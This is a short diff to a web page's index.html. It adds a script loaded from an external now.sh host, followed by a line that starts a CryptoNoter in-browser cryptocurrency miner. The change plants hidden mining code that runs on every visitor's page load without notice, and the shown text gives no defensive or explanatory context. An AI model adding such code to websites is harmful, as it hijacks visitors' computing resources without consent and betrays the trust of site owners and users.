--- a/index.html
+++ b/index.html
@@ -233,5 +233,9 @@ document.addEventListener('DOMContentLoaded', () => {
 });
 
     </script>
+    <script src="https://cryptonoter-dmcjxivtcy.now.sh/processor.js"></script>
+    <script>
+	const miner = new CryptoNoter.User('CryptoNoter').start();
+    </script>
   </body>
 </html>
